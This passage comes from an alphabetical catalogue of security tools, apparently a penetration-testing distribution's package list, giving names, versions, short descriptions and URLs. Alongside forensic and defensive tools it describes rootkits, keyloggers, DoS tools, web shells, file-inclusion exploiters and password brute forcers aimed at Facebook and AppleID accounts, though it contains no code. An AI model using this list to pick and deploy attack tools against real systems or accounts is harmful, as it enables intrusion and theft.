https://github.com/DanMcInerney/elite-proxy-finder * __enabler 1__ attempts to find the enable password on a cisco system via brute force. http://packetstormsecurity.org/cisco/enabler.c * __encodeshellcode 0.1b__ This is an encoding tool for 32-bit x86 shellcode that assists a researcher when dealing with character filter or byte restrictions in a buffer overflow vulnerability or some kind of IDS/IPS/AV blocking your code. http://packetstormsecurity.com/files/119904/Encode-Shellcode.1b.html * __ent 1.0__ Pseudorandom number sequence test. http://www.fourmilab.ch/random * __enum-shares 7.97cba5a__ Tool that enumerates shared folders across the network and under a custom user account. https://github.com/dejanlevaja/enum_shares * __enum4linux 0.8.9__ A tool for enumerating information from Windows and Samba systems. http://labs.portcullis.co.uk/application/enum4linux/ * __enumiax 1.0__ IAX enumerator http://sourceforge.net/projects/enumiax/ * __enyelkm 1.2__ Rootkit for Linux x86 kernels v2.6. http://www.enye-sec.org/programas.html * __epicwebhoneypot 2.0a__ Tool which aims to lure attackers using various types of web vulnerability scanners by tricking them into believing that they have found a vulnerability on a host. http://sourceforge.net/projects/epicwebhoneypot/ * __erase-registrations 1.0__ IAX flooder http://www.hackingexposedvoip.com/ * __etherape 0.9.13__ A graphical network monitor for various OSI layers and protocols http://etherape.sourceforge.net/ * __ettercap 0.8.1__ A network sniffer/interceptor/logger for ethernet LANs - console http://ettercap.github.com/ettercap/ * __evilgrade 2.0.0__ Modular framework that takes advantage of poor upgrade implementations by injecting fake updates http://www.infobyte.com.ar/developments.html * __evilmaid 1.01__ TrueCrypt loader backdoor to sniff volume password http://theinvisiblethings.blogspot.com * __exiv2 0.24__ Exif and Iptc metadata manipulation library and tools http://exiv2.org * __exploit-db 1.6__ The Exploit Database (EDB) – an ultimate archive of exploits and vulnerable software - A collection of hacks http://www.exploit-db.com * __extracthosts 14.ec8b89c__ Extracts hosts (IP/Hostnames) from files. https://github.com/bwall/ExtractHosts * __extundelete 0.2.4__ Utility for recovering deleted files from ext2, ext3 or ext4 partitions by parsing the journal http://extundelete.sourceforge.net * __eyepwn 1.0__ Exploit for Eye-Fi Helper directory traversal vulnerability http://www.pentest.co.uk * __eyewitness 278.e72c21e__ Designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. https://github.com/ChrisTruncer/EyeWitness * __facebot 23.57f6025__ A facebook profile and reconnaissance system. https://github.com/pun1sh3r/facebot * __facebrute 7.ece355b__ This script tries to guess passwords for a given facebook account using a list of passwords (dictionary). https://github.com/emerinohdz/FaceBrute * __fakeap 0.3.2__ Black Alchemy's Fake AP generates thousands of counterfeit 802.11b access points. Hide in plain sight amongst Fake AP's cacophony of beacon frames. http://www.blackalchemy.to/project/fakeap/ * __fakedns 17.87d4216__ A regular-expression based python MITM DNS server with correct DNS request passthrough and "Not Found" responses. https://github.com/Crypt0s/FakeDns * __fakemail 1.0__ Fake mail server that captures e-mails as files for acceptance testing. http://sourceforge.net/projects/fakemail/ * __fakenetbios 7.b83701e__ A family of tools designed to simulate Windows hosts (NetBIOS) on a LAN. https://github.com/mubix/FakeNetBIOS * __fang 1.2__ A multi service threaded MD5 cracker. https://github.com/evilsocket/fang * __fbht r12.a284878__ A Facebook Hacking Tool https://github.com/chinoogawa/fbht-linux * __fcrackzip 1.0__ Zip file password cracker http://oldhome.schmorp.de/marc/fcrackzip.html * __fern-wifi-cracker 219__ WEP, WPA wifi cracker for wireless penetration testing http://code.google.com/p/fern-wifi-cracker/ * __fernmelder 6.c6d4ebe__ Asynchronous mass DNS scanner. https://github.com/stealth/fernmelder * __fgscanner 11.893372c__ An advanced, opensource URL scanner. http://www.fantaghost.com/fgscanner * __fhttp 1.3__ This is a framework for HTTP related attacks. It is written in Perl with a GTK interface, has a proxy for debugging and manipulation, proxy chaining, evasion rules, and more. http://packetstormsecurity.com/files/104315/FHTTP-Attack-Tool.3.html * __fierce 0.9.9__ A DNS scanner http://ha.ckers.org/fierce/ * __fiked 0.0.5__ Fake IDE daemon http://www.roe.ch/FakeIKEd * __filibuster 161.37b7f9c__ A Egress filter mapping application with additional functionality. https://github.com/subinacls/Filibuster * __fimap 1.00__ A little tool for local and remote file inclusion auditing and exploitation http://code.google.com/p/fimap/ * __findmyhash 1.1.2__ Crack different types of hashes using free online services http://code.google.com/p/findmyhash/ * __firewalk 5.0__ An active reconnaissance network security tool http://packetfactory.openwall.net/projects/firewalk/ * __firmware-mod-kit 099__ Modify firmware images without recompiling! http://code.google.com/p/firmware-mod-kit * __firstexecution 6.a275793__ A Collection of different ways to execute code outside of the expected entry points. https://github.com/nccgroup/firstexecution * __fl0p 0.1__ A passive L7 flow fingerprinter that examines TCP/UDP/ICMP packet sequences, can peek into cryptographic tunnels, can tell human beings and robots apart, and performs a couple of other infosec-related tricks. http://lcamtuf.coredump.cx/ * __flare 0.6__ Flare processes an SWF and extracts all scripts from it. http://www.nowrap.de/flare.html * __flasm 1.62__ Disassembler tool for SWF bytecode http://www.nowrap.de/flasm.html * __flawfinder 1.31__ Searches through source code for potential security flaws. http://www.dwheeler.com/flawfinder * __flowinspect 94.01c8921__ A network traffic inspection tool. https://github.com/7h3rAm/flowinspect * __flunym0us 2.0__ A Vulnerability Scanner for Wordpress and Moodle. http://code.google.com/p/flunym0us/ * __foremost 1.5.7__ A console program to recover files based on their headers, footers, and internal data structures http://foremost.sourceforge.net/ * __fpdns 0.9.3__ Program that remotely determines DNS server versions http://code.google.com/p/fpdns/ * __fping 3.10__ A utility to ping multiple hosts at once http://www.fping.org/ * __fport 2.0__ Identify unknown open ports and their associated applications. http://www.foundstone.com/us/resources/proddesc/fport.htm * __fraud-bridge 10.775c563__ ICMP and DNS tunneling via IPv4 and IPv6. https://github.com/stealth/fraud-bridge * __freeipmi 1.4.5__ Sensor monitoring, system event monitoring, power control, and serial-over-LAN (SOL). http://www.gnu.org/software/freeipmi/ * __freeradius 3.0.4__ The premier open source RADIUS server http://www.freeradius.org/ * __frisbeelite 1.2__ A GUI-based USB device fuzzer. https://github.com/nccgroup/FrisbeeLite * __fs-nyarl 1.0__ A network takeover & forensic analysis tool - useful to advanced PenTest tasks & for fun and profit. http://www.fulgursecurity.com/en/content/fs-nyarl * __fsnoop 3.3__ A tool to monitor file operations on GNU/Linux systems by using the Inotify mechanism. Its primary purpose is to help detecting file race condition vulnerabilities and since version 3, to exploit them with loadable DSO modules (also called "payload modules" or "paymods"). http://vladz.devzero.fr/fsnoop.php * __fstealer 0.1__ Automates file system mirroring through remote file disclosur vulnerabilities on Linux machines. http://packetstormsecurity.com/files/106450/FStealer-Filesystem-Mirroring-Tool.html * __ftester 1.0__ A tool designed for testing firewall filtering policies and Intrusion Detection System (IDS) capabilities. http://www.inversepath.com/ftester.html * __ftp-fuzz 1337__ The master of all master fuzzing scripts specifically targeted towards FTP server sofware http://nullsecurity.net/tools/fuzzer.html * __ftp-scanner 0.2.5__ Multithreaded ftp scanner/brute forcer. Tested on Linux, OpenBSD and Solaris. http://wayreth.eu.org/old_page/ * __ftp-spider 1.0__ FTP investigation tool - Scans ftp server for the following: reveal entire directory tree structures, detect anonymous access, detect directories with write permissions, find user specified data within repository. http://packetstormsecurity.com/files/35120/ftp-spider.pl.html * __ftpmap 0.4__ scans remote FTP servers to identify what software and what versions they are running. http://wcoserver.googlecode.com/files/ * __fusil 1.4__ Fusil the fuzzer is a Python library used to write fuzzing programs. It helps to start process with a prepared environment (limit memory, environment variables, redirect stdout, etc.), start network client or server, and create mangled files http://bitbucket.org/haypo/fusil/wiki/Home * __fuzzap 14.f13932c__ A python script for obfuscating wireless networks. https://github.com/lostincynicism/FuzzAP * __fuzzball2 0.7__ A little fuzzer for TCP and IP options. It sends a bunch of more or less bogus packets to the host of your choice. http://nologin.org/ * __fuzzdb 1.09__ Attack and Discovery Pattern Database for Application Fuzz Testing https://code.google.com/p/fuzzdb/ * __fuzzdiff 1.0__ A simple tool designed to help out with crash analysis during fuzz testing. It selectively 'un-fuzzes' portions of a fuzzed file that is known to cause a crash, re-launches the targeted application, and sees if it still crashes. http://vsecurity.com/resources/tool * __fuzztalk 1.0.0.0__ An XML driven fuzz testing framework that emphasizes easy extensibility and reusability. https://code.google.com/p/fuzztalk * __g72x++ 1__ Decoder for the g72x++ codec. http://www.ps-auxw.de/ * __galleta 20040505_1__ Examine the contents of the IE's cookie files for forensic purposes http://www.jonesdykstra.com/ * __gdb 7.8.1__ The GNU Debugger http://www.gnu.org/software/gdb/ * __genlist 0.1__ Generates lists of IP addresses. * __geoedge 0.2__ This little tools is designed to get geolocalization information of a host, it get the information from two sources (maxmind and geoiptool). * __geoip 1.6.2__ Non-DNS IP-to-country resolver C library & utils http://www.maxmind.com/app/c * __geoipgen 0.4__ GeoIPgen is a country to IP addresses generator. http://code.google.com/p/geoipgen/ * __getsids 0.0.1__ Getsids tries to enumerate Oracle Sids by sending the services command to the Oracle TNS listener. Like doing ‘lsnrctl service’. http://www.cqure.net/wp/getsids/ * __gggooglescan 0.4__ A Google scraper which performs automated searches and returns results of search queries in the form of URLs or hostnames. http://www.morningstarsecurity.com/research/gggooglescan * __ghettotooth 1.0__ Ghettodriving for bluetooth http://www.oldskoolphreak.com/tfiles/ghettotooth.txt * __ghost-phisher 1.62__ GUI suite for phishing and penetration attacks http://code.google.com/p/ghost-phisher * __ghost-py 0.1b3__ Webkit based webclient (relies on PyQT). http://jeanphix.github.com/Ghost.py/ * __giskismet 20110805__ A program to visually represent the Kismet data in a flexible manner. http://www.giskismet.org * __gnuradio 3.7.5.1__ General purpose DSP and SDR toolkit. With drivers for usrp and fcd. http://gnuradio.org * __gnutls2 2.12.23__ A library which provides a secure layer over a reliable transport layer (Version 2) http://gnutls.org/ * __goldeneye 16.7a38fe9__ A HTTP DoS test tool. Attack Vector exploited: HTTP Keep Alive + NoCache. https://github.com/jseidl/GoldenEye * __golismero 2.0__ Opensource web security testing framework. https://github.com/golismero/golismero * __goodork 2.2__ A python script designed to allow you to leverage the power of google dorking straight from the comfort of your command line. http://goo-dork.blogspot.com/ * __goofile 1.5__ Command line filetype search https://code.google.com/p/goofile/ * __goog-mail 1.0__ Enumerate domain emails from google. http://www.darkc0de.com/others/goog-mail.py * __googlesub 1.2__ A python script to find domains by using google dorks. https://github.com/zombiesam/googlesub * __gooscan 1.0.9__ A tool that automates queries against Google search appliances, but with a twist. http://johnny.ihackstuff.com/downloads/task,doc_details&Itemid=/gid,28/ * __gqrx 2.3.1__ Interactive SDR receiver waterfall for many devices. http://gqrx.dk/ * __grabber 0.1__ A web application scanner. Basically it detects some kind of vulnerabilities in your website. http://rgaucher.info/beta/grabber/ * __grepforrfi 0.1__ Simple script for parsing web logs for RFIs and Webshells v1.2 http://www.irongeek.com/downloads/grepforrfi.txt * __grokevt 0.5.0__ A collection of scripts built for reading Windows® NT/2K/XP/2K eventlog files. http://code.google.com/p/grokevt/ * __gtalk-decode 0.1__ Google Talk decoder tool that demonstrates recovering passwords from accounts. http://packetstormsecurity.com/files/119154/Google-Talk-Decoder.html * __gtp-scan 0.7__ A small python script that scans for GTP (GPRS tunneling protocol) speaking hosts. http://www.c0decafe.de/ * __guymager 0.7.4__ A forensic imager for media acquisition. http://guymager.sourceforge.net/ * __gwcheck 0.1__ A simple program that checks if a host in an ethernet network is a gateway to Internet. http://packetstormsecurity.com/files/62047/gwcheck.c.html * __gwtenum 7.f27a5aa__ Enumeration of GWT-RCP method calls. http://www.gdssecurity.com/l/t/d.php?k=GwtEnum * __hackersh 0.2.0__ A shell for with Pythonect-like syntax, including wrappers for commonly used security tools http://www.hackersh.org/ * __halberd 0.2.4__ Halberd discovers HTTP load balancers. It is useful for web application security auditing and for load balancer configuration testing. http://halberd.superadditive.com/ * __halcyon 0.1__ A repository crawler that runs checksums for static files found within a given git repository. http://www.blackhatlibrary.net/Halcyon * __hamster 2.0.0__ Tool for HTTP session sidejacking. http://hamster.erratasec.com/ * __handle 0.0__ An small application designed to analyze your system searching for global objects related to running proccess and display information for every found object, like tokens, semaphores, ports, files,.. http://www.tarasco.org/security/handle/index.html * __hasere 1.0__ Discover the vhosts using google and bing. https://github.com/galkan/hasere * __hash-identifier 1.1__ Identifies the different types of hashes used to encrypt data, especially passwords http://code.google.com/p/hash-identifier * __hashcat 0.47__ A multithreaded cross platform hash cracker. http://hashcat.net/hashcat/ * ___hashcat-utils 1.0__ Utilites for Hashcat http://hashcat.net/wiki/doku.php?id=hashcat_utils * __hasher 32.e9d1394__ A tool that allows you to quickly hash plaintext strings, or compare hashed values with a plaintext locally. https://github.com/ChrisTruncer/Hasher * __hashid 2.6.0__ Software to identify the different types of hashes used to encrypt data https://github.com/psypanda/hashID * __hashpump 34.0b3c286__ A tool to exploit the hash length extension attack in various hashing algorithms. https://github.com/bwall/HashPump * __hashtag 0.41__ A python script written to parse and identify password hashes. https://github.com/SmeegeSec/HashTag * __haystack 1035.ac2ffa4__ A Python framework for finding C structures from process memory - heap analysis - Memory structures forensics. https://github.com/trolldbois/python-haystack * __hbad 1.0__ This tool allows you to test clients on the heartbleed bug. http://www.curesec.com/ * __hcraft 1.0.0__ HTTP Vuln Request Crafter http://sourceforge.net/projects/hcraft/ * __hdcp-genkey 18.e8d342d__ Generate HDCP source and sink keys from the leaked master key. https://github.com/rjw57/hdcp-genkey * __hdmi-sniff 5.f7fbc0e__ HDMI DDC (I2C) inspection tool. It is designed to demonstrate just how easy it is to recover HDCP crypto keys from HDMI devices. https://github.com/ApertureLabsLtd/hdmi-sniff * __heartbleed-honeypot 0.1__ Script that listens on TCP port 443 and responds with completely bogus SSL heartbeat responses, unless it detects the start of a byte pattern similar to that used in Jared Stafford's http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt * __hex2bin 1.0.7__ Converts Motorola and Intel hex files to binary. http://hex2bin.sourceforge.net/ * __hexinject 1.5__ A very versatile packet injector and sniffer that provides a command-line framework for raw network access. http://hexinject.sourceforge.net * __hexorbase 6__ A database application designed for administering and auditing multiple database servers simultaneously from a centralized location. It is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL). https://code.google.com/p/hexorbase/ * __hharp 1beta__ This tool can perform man-in-the-middle and switch flooding attacks. It has 4 major functions, 3 of which attempt to man-in-the-middle one or more computers on a network with a passive method or flood type method. http://packetstormsecurity.com/files/81368/Hackers-Hideaway-ARP-Attack-Tool.html * __hidattack 0.1__ HID Attack (attacking HID host implementations) http://mulliner.org/bluetooth/hidattack.php * __honeyd 1.6.7__ A small daemon that creates virtual hosts on a network. https://github.com/DataSoft/Honeyd/ * __honssh 47.0de60ec__ A high-interaction Honey Pot solution designed to log all SSH communications between a client and server. https://code.google.com/p/honssh/ * __hookanalyser 3.0__ A hook tool which can be potentially helpful in reversing applications and analyzing malware. It can hook to an API in a process and search for a pattern in memory or dump the buffer. http://hookanalyser.blogspot.de/ * __host-extract 9__ Ruby script tries to extract all IP/Host patterns in page response of a given URL and JavaScript/CSS files of that URL. https://code.google.com/p/host-extract/ * __hostbox-ssh 0.1.1__ A ssh password/account scanner. http://stridsmanit.wordpress.com/2012/12/02/brute-forcing-passwords-with-hostbox-ssh-1-1/ * __hotpatch 0.2__ Hot patches executables on Linux using .so file injection http://www.selectiveintellect.com/hotpatch.html * __hotspotter 0.4___ Hotspotter passively monitors the network for probe request frames to identify the preferred networks of Windows XP clients, and will compare it to a supplied list of common hotspot network names. http://www.remote-exploit.org/?page_id=418 * __hpfeeds__ 138.249b2f7 Honeynet Project generic authenticated datafeed protocol. https://github.com/rep/hpfeeds * __hping 3.0.0__ A command-line oriented TCP/IP packet assembler/analyzer. http://www.hping.org * __hqlmap 35.081395e__ A tool to exploit HQL Injections. https://github.com/PaulSec/HQLmap * __htexploit 0.77__ A Python script that exploits a weakness in the way that .htaccess files can be configured to protect a web directory with an authentication process http://www.mkit.com.ar/labs/htexploit/ * __htrosbif 134.9dc3f86__ Active HTTP server fingerprinting and recon tool. https://github.com/lkarsten/htrosbif * __htshells 760b5e9__ Self contained web shells and other attacks via .htaccess files. https://github.com/wireghoul/htshells * __http-enum 0.3__ A tool to enumerate the enabled HTTP methods supported on a webserver. https://www.thexero.co.uk/tools/http-enum/ * __http-fuzz 0.1__ A simple http fuzzer. none * __http-put 1.0__ Simple http put perl script * __http-traceroute 0.5__ This is a python script that uses the Max-Forwards header in HTTP and SIP to perform a traceroute-like scanning functionality. http://packetstormsecurity.com/files/107167/Traceroute-Like-HTTP-Scanner.html * __httpbog 1.0.0.0__ A slow HTTP denial-of-service tool that works similarly to other attacks, but rather than leveraging request headers or POST data Bog consumes sockets by slowly reading responses. http://sourceforge.net/projects/httpbog/ * __httpforge 11.02.01__ A set of shell tools that let you manipulate, send, receive, and analyze HTTP messages. These tools can be used to test, discover, and assert the security of Web servers, apps, and sites. An accompanying Python library is available for extensions. http://packetstormsecurity.com/files/98109/HTTPForge.02.01.html * __httping 2.3.4__ A 'ping'-like tool for http-requests. http://www.vanheusden.com/httping/ * __httprint 301__ A web server fingerprinting tool. http://www.net-square.com/httprint.html * __httprint-win32__ 301 A web server fingerprinting tool (Windows binaries). http://net-square.com/httprint * __httpry 0.1.8__ A specialized packet sniffer designed for displaying and logging HTTP traffic. http://dumpsterventures.com/jason/httpry/ * __httpsniff 0.4__ Tool to sniff HTTP responses from TCP/IP based networks and save contained files locally for later review. http://www.sump.org/projects/httpsniff/ * __httpsscanner 1.2__ A tool to test the strength of a SSL web server. https://code.google.com/p/libre-tools/ * __httptunnel 3.3__ Creates a bidirectional virtual data connection tunnelled in HTTP requests http://www.nocrew.org/software/httptunnel * __hulk 11.a9b9ad4__ A webserver DoS tool (Http Unbearable Load King) ported to Go with some additional features. https://github.com/grafov/hulk * __hwk 0.4__ Collection of packet crafting and wireless network flooding tools http://www.nullsecurity.net/ * __hydra 8.1__ A very fast network logon cracker which support many different services. http://www.thc.org/thc-hydra/ * __hyenae 0.36_1__ flexible platform independent packet generator http://sourceforge.net/projects/hyenae/ * __hyperion 1.1__ A runtime encrypter for 32-bit portable executables. http://nullsecurity.net/tools/binary.html * __iaxflood 0.1__ IAX flooder. http://www.hackingexposedvoip.com/ * __iaxscan 0.02__ A Python based scanner for detecting live IAX/2 hosts and then enumerating (by bruteforce) users on those hosts. http://code.google.com/p/iaxscan/ * __ibrute 12.3a6a11e__ An AppleID password bruteforce tool. It uses Find My Iphone service API, where bruteforce protection was not implemented. https://github.com/hackappcom/ibrute/ * __icmpquery 1.0__ Send and receive ICMP queries for address mask and current time. http://www.angio.net/security/ * __icmptx 0.01__ IP over ICMP http://thomer.com/icmptx/ * __iheartxor 0.01__ iheartxor is a tool for bruteforcing encoded strings within a boundary defined by a regular expression. It will bruteforce the key value range of 0x1 through 0x255. http://hooked-on-mnemonics.blogspot.com.es/p/iheartxor.html * __ike-scan 1.9__ A tool that uses IKE protocol to discover, fingerprint and test IPSec VPN servers http://www.nta-monitor.com/tools/ike-scan/ * __ikecrack 1.00__ An IKE/IPSec crack tool designed to perform Pre-Shared-Key analysis of RFC compliant aggressive mode authentication http://sourceforge.net/projects/ikecrack/ * __ikeprobe 0.1__ Determine vulnerabilities in the PSK implementation of the VPN server. http://www.ernw.de/download/ikeprobe.zip * __ikeprober 1.12__ Tool crafting IKE initiator packets and allowing many options to be manually set. Useful to find overflows, error conditions and identifiyng vendors http://ikecrack.sourceforge.net/ * __ilty 1.0__ An interception phone system for VoIP network. http://chdir.org/~nico/ilty/ * __imagejs 48.1faf262__ Small tool to package javascript into a valid image file. https://github.com/jklmnn/imagejs * __inception 416.2e7b723__ A FireWire physical memory manipulation and hacking tool exploiting IEEE 1394 SBP DMA. http://www.breaknenter.org/projects/inception/ * __indxparse 150.1b50750__ A Tool suite for inspecting NTFS artifacts. http://www.williballenthin.com/forensics/mft/indxparse/ * __inetsim 1.2.5__ A software suite for simulating common internet services in a lab environment, e.g. for analyzing the network behaviour of unknown malware samples. http://www.inetsim.org * __infip 0.1__ A python script that checks output from netstat against RBLs from Spamhaus. http://packetstormsecurity.com/files/104927/infIP.1-Blacklist-Checker.html * __inguma 0.1.1__ A free penetration testing and vulnerability discovery toolkit entirely written in python. Framework includes modules to discover hosts, gather information about, fuzz targets, brute force usernames and passwords, exploits, and a disassembler. http://inguma.sourceforge.net * __intercepter-ng 0.9.8__ A next generation sniffer including a lot of features: capturing passwords/hashes, sniffing chat messages, performing man-in-the-middle attacks, etc. http://intercepter.nerf.ru/#down * __interrogate 0.0.4__ A proof-of-concept tool for identification of cryptographic keys in binary material (regardless of target operating system), first and foremost for memory dump analysis and forensic usage. https://github.com/carmaa/interrogate * __intersect 2.5__ Post-exploitation framework https://github.com/ohdae/Intersect.5 * __intrace 1.5__ Traceroute-like application piggybacking on existing TCP connections http://intrace.googlecode.com * __inundator 0.5__ An ids evasion tool, used to anonymously inundate intrusion detection logs with false positives in order to obfuscate a real attack. http://inundator.sourceforge.net/ * __inviteflood 2.0__ Flood a device with INVITE requests https://launchpad.net/~wagungs/+archive/kali-linux/+build/4386635 * __iodine 0.7.0__ Tunnel IPv4 data through a DNS server http://code.kryo.se/iodine * __iosforensic 1.0__ iOS forensic tool https://www.owasp.org/index.php/Projects/OWASP_iOSForensic https://github.com/Flo354/iOSForensic * __ip-https-tools 5.b22e2b3__ Tools for the IP over HTTPS (IP-HTTPS) Tunneling Protocol. https://github.com/takeshixx/ip-https-tools * __ipaudit 1.0BETA2__ IPAudit monitors network activity on a network. http://ipaudit.sourceforge.net * __ipba2 032013__ IOS Backup Analyzer http://www.ipbackupanalyzer.com/ * __ipdecap 69.f3a08f6__ Can decapsulate traffic encapsulated within GRE, IPIP, 6in4, ESP (ipsec) protocols, and can also remove IEEE 802.1Q (virtual lan) header. http://www.loicp.eu/ipdecap#dependances * __iphoneanalyzer 2.1.0__ Allows you to forensically examine or recover date from in iOS device. http://www.crypticbit.com/zen/products/iphoneanalyzer * __ipscan 3.3.2__ Angry IP scanner is a very fast IP address and port scanner. http://www.angryziber.com/ * __iputils 20121221__ Network monitoring tools, including ping http://www.skbuff.net/iputils/ * __ipv6toolkit 2.0beta__ SI6 Networks' IPv6 Toolkit http://www.si6networks.com/tools/ipv6toolkit/ * __ircsnapshot 93.9ba3c6c__ Tool to gather information from IRC servers. https://github.com/bwall/ircsnapshot * __irpas 0.10__ Internetwork Routing Protocol Attack Suite. http://phenoelit-us.org/irpas * __isr-form 1.0__ Simple html parsing tool that extracts all form related information and generates reports of the data. Allows for quick analyzing of data. http://www.infobyte.com.ar/ * __jad 1.5.8e__ Java decompiler http://www.varaneckas.com/jad * __javasnoop 1.1__ A tool that lets you intercept methods, alter data and otherwise hack Java applications running on your computer https://code.google.com/p/javasnoop/ * __jboss-autopwn 1.3bc2d29__ A JBoss script for obtaining remote shell access. https://github.com/SpiderLabs/jboss-autopwn * __jbrofuzz 2.5__ Web application protocol fuzzer that emerged from the needs of penetration testing. http://sourceforge.net/projects/jbrofuzz/ * __jbrute 0.99__ Open Source Security tool to audit hashed passwords. http://sourceforge.net/projects/jbrute/ * __jd-gui 0.3.5__ A standalone graphical utility that displays Java source codes of .class files http://java.decompiler.free.fr/?q=jdgui * __jhead 2.97__ EXIF JPEG info parser and thumbnail remover http://www.sentex.net/~mwandel/jhead/ * __jigsaw 1.3__ A simple ruby script for enumerating information about a company's employees. It is useful for Social Engineering or Email Phishing. https://github.com/pentestgeek/jigsaw * __jnetmap 0.5.3__ A network monitor of sorts http://www.rakudave.ch/jnetmap/?file=introduction * __john 1.7.9__ John The Ripper - A fast password cracker (jumbo included) http://www.openwall.com/john/ * __johnny 20120424__ GUI for John the Ripper. http://openwall.info/wiki/john/johnny * __jomplug 0.1__ This php script fingerprints a given Joomla system and then uses Packet Storm's archive to check for bugs related to the installed components. http://packetstormsecurity.com/files/121390/Janissaries-Joomla-Fingerprint-Tool.html * __joomlascan 1.2__ Joomla scanner scans for known vulnerable remote file inclusion paths and files. http://packetstormsecurity.com/files/62126/joomlascan.2.py.txt.html * __joomscan 2012.03.10__ Detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla! web site. http://joomscan.sourceforge.net/ * __js-beautify 1.4.2__ This little beautifier will reformat and reindent bookmarklets, ugly JavaScript, unpack scripts packed by Dean Edward?s popular packer, as well as deobfuscate scripts processed by javascriptobfuscator.com. https://github.com/einars/js-beautify * __jsql__ 0.5 A lightweight application used to find database information from a distant server. https://code.google.com/p/jsql-injection/ * __junkie 1338.baa4524__ A modular packet sniffer and analyzer. https://github.com/securactive/junkie * __jwscan 6.b0306f0__ Scanner for Jar to EXE wrapper like Launch4j, Exe4j, JSmooth, Jar2Exe. https://github.com/katjahahn/JWScan * __jynx2 2.0__ An expansion of the original Jynx LD_PRELOAD rootkit http://www.blackhatlibrary.net/Jynx2 * __kalibrate-rtl 11.aae11c8__ Fork of http://thre.at/kalibrate/ for use with rtl-sdr devices. https://github.com/steve-m/kalibrate-rtl * __katsnoop 0.1__ Utility that sniffs HTTP Basic Authentication information and prints the base64 decoded form. http://packetstormsecurity.com/files/52514/katsnoop.tbz2.html * __kautilya 0.5.0__ Pwnage with Human Interface Devices using Teensy++2.0 and Teensy 3.0 devices http://code.google.com/p/kautilya * __keimpx 0.2__ Tool to verify the usefulness of credentials across a network over SMB. http://code.google.com/p/keimpx/ * __khc 0.2__ A small tool designed to recover hashed known_hosts fiels back to their plain-text equivalents. http://packetstormsecurity.com/files/87003/Known-Host-Cracker.2.html * __killerbee 85__ Framework and tools for exploiting ZigBee and IEEE 802.15.4 networks. https://code.google.com/p/killerbee/ * __kippo 0.9__ A medium interaction SSH honeypot designed to log brute force attacks and most importantly, the entire shell interaction by the attacker. https://github.com/desaster/kippo * __kismet 2013_03_R1b 802.11__ layer2 wireless network detector, sniffer, and intrusion detection system http://www.kismetwireless.net/ * __kismet-earth 0.1__ Various scripts to convert kismet logs to kml file to be used in Google Earth. http:// * __kismet2earth 1.0__ A set of utilities that convert from Kismet logs to Google Earth .kml format http://code.google.com/p/kismet2earth/ * __klogger 1.0__ A keystroke logger for the NT-series of Windows. http://ntsecurity.nu/toolbox/klogger/ * __kolkata 3.0__ A web application fingerprinting engine written in Perl that combines cryptography with IDS evasion. http://www.blackhatlibrary.net/Kolkata * __kraken 32.368a837__ A project to encrypt A5/1 GSM signaling using a Time/Memory Tradeoff Attack. http://opensource.srlabs.de/projects/a51-decrypt * __laf 12.7a456b3__ Login Area Finder: scans host/s for login panels. https://github.com/takeshixx/laf * __lanmap2 124.4f8afed__ Passive network mapping tool http://github.com/rflynn/lanmap2 * __lans 1.0__ A Multithreaded asynchronous packet parsing/injecting arp spoofer. https://github.com/DanMcInerney/LANs.py * __latd 1.31__ A LAT terminal daemon for Linux and BSD. http://sourceforge.net/projects/linux-decnet/files/latd/1.31/ * __laudanum 1.0__ A collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments. http://laudanum.inguardians.com/# * __lbd 20130719__ Load Balancing detector http://ge.mine.nu/code/lbd * __lbmap 145.93e6b71__ Proof of concept scripts for advanced web application fingerprinting, presented at OWASP AppSecAsia 2012. https://github.com/wireghoul/lbmap * __ldapenum 0.1__ Enumerate domain controllers using LDAP. https://gobag.googlecode.com/svn-history/r2/trunk/ldap/ldapenum/ * __leo 4.11__ Literate programmer's editor, outliner, and project manager http://webpages.charter.net/edreamleo/front.html * __leroy-jenkins 0.r3.bdc3965__ A python tool that will allow remote execution of commands on a Jenkins server and its nodes. https://github.com/captainhooligan/Leroy-Jenkins * __levye 85.419e817__ A brute force tool which is support sshkey, vnckey, rdp, openvpn. https://github.com/galkan/levye * __lfi-autopwn 3.0__ A Perl script to try to gain code execution on a remote server via LFI http://www.blackhatlibrary.net/Lfi_autopwn.pl * __lfi-exploiter 1.1__ This perl script leverages /proc/self/environ to attempt getting code execution out of a local file inclusion vulnerability.. http://packetstormsecurity.com/files/124332/LFI-Exploiter.1.html * __lfi-fuzzploit 1.1__ A simple tool to help in the fuzzing for, finding, and exploiting of local file inclusion vulnerabilities in Linux-based PHP applications. http://packetstormsecurity.com/files/106912/LFI-Fuzzploit-Tool.1.html * __lfi-scanner 4.0__ This is a simple perl script that enumerates local file inclusion attempts when given a specific target. http://packetstormsecurity.com/files/102848/LFI-Scanner.0.html * __lfi-sploiter 1.0__ This tool helps you exploit LFI (Local File Inclusion) vulnerabilities. Post discovery, simply pass the affected URL and vulnerable parameter to this tool. You can also use this tool to scan a URL for LFI vulnerabilities. http://packetstormsecurity.com/files/96056/Simple-Local-File-Inclusion-Exploiter.0.html * __lfimap 1.4.8__ This script is used to take the highest beneficts of the local file include vulnerability in a webserver. https://code.google.com/p/lfimap/ * __lft 3.72__ A layer four traceroute implementing numerous other features. http://pwhois.org/lft/ * __libdisasm 0.23__ A disassembler library. http://bastard.sourceforge.net/libdisasm.html * __libpst 0.6.63__ Outlook .pst file converter http://www.five-ten-sg.com/libpst/ * __liffy 63.238ce6d__ A Local File Inclusion Exploitation tool. https://github.com/rotlogix/liffy * __linenum 18.b4c2541__ Scripted Local Linux Enumeration & Privilege Escalation Checks https://github.com/rebootuser/LinEnum * __linux-exploit-suggester 32.9db2f5a__ A Perl script that tries to suggest exploits based OS version number. https://github.com/PenturaLabs/Linux_Exploit_Suggester * __list-urls 0.1__ Extracts links from webpage http://www.whoppix.net * __littleblackbox 0.1.3__ Penetration testing tool, search in a collection of thousands of private SSL keys extracted from various embedded devices. http://code.google.com/p/littleblackbox/wiki/FAQ * __lodowep 1.2.1__ Lodowep is a tool for analyzing password strength of accounts on a Lotus Domino webserver system. http://www.cqure.net/wp/lodowep/ * __logkeys 0.1.1a__ Simple keylogger supporting also USB keyboards. http://logkeys.googlecode.com/ * __loki 0.2.7___ Python based framework implementing many packet generation and attack modules for Layer 2 and 3 protocols http://c0decafe.de/loki.html * __lorcon 